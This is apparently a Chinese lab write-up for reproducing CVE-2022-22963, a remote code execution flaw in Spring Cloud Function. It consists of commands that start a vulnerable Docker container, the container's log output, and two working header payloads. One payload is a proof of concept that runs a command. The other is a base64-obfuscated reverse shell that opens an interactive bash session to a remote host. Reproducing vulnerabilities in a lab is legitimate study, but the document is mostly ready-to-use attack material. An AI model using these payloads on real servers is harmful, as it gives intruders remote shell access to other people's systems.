CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_漏洞复现
需要有Docker环境
启动漏洞环境方式1
git clone https://github.com/RanDengShiFu/CVE-2022-22963.git;cd CVE-2022-22963;bash Start.sh
启动漏洞环境方式2
rm -rf CVE-2022-22963/;mkdir CVE-2022-22963/;cd CVE-2022-22963/;git clone https://github.com/N1ce759/Spring-Cloud-Function-SPEL-RCE;cd ..;pwd;docker run -p 9000:9000 --name=CVE-2022-22963 --restart=always -v $PWD/CVE-2022-22963/Spring-Cloud-Function-SPEL-RCE:/root/ tomcat:10.1-jdk17-temurin java -jar /root/SpringCloud-Function-0.0.1-SNAPSHOT.jar;
👇👇👇👇👇👇👇👇👇👇👇
[root@localhost Spring_cloud_function_RCE]# bash Start_.sh
Cloning into 'Spring-Cloud-Function-SPEL-RCE'...
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 9 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (9/9), 17.30 MiB | 2.58 MiB/s, done.
/data/Spring_cloud_function_RCE
. ____ _ __ _ _
/\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
\\/ ___)| |_)| | | | | || (_| | ) ) ) )
' |____| .__|_| |_|_| |_\__, | / / / /
=========|_|==============|___/=/_/_/_/
:: Spring Boot :: (v2.6.5)
2022-03-30 11:40:05.274 INFO 1 --- [ main] c.e.S.F.SpringCloudFunctionApplication : Starting SpringCloudFunctionApplication v0.0.1-SNAPSHOT using Java 17.0.2 on 6725bdc775ef with PID 1 (/root/SpringCloud-Function-0.0.1-SNAPSHOT.jar started by root in /usr/local/tomcat)
2022-03-30 11:40:05.279 INFO 1 --- [ main] c.e.S.F.SpringCloudFunctionApplication : No active profile set, falling back to 1 default profile: "default"
2022-03-30 11:40:06.624 INFO 1 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat initialized with port(s): 9000 (http)
2022-03-30 11:40:06.626 INFO 1 --- [ main] o.a.catalina.core.AprLifecycleListener : Loaded Apache Tomcat
漏洞poc:
{'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("clac")', 'Content-Type': 'application/x-www-form-urlencoded'}
反弹shell:
{'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjAuMC4xLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}")', 'Co ntent-Type': 'application/x-www-form-urlencoded'}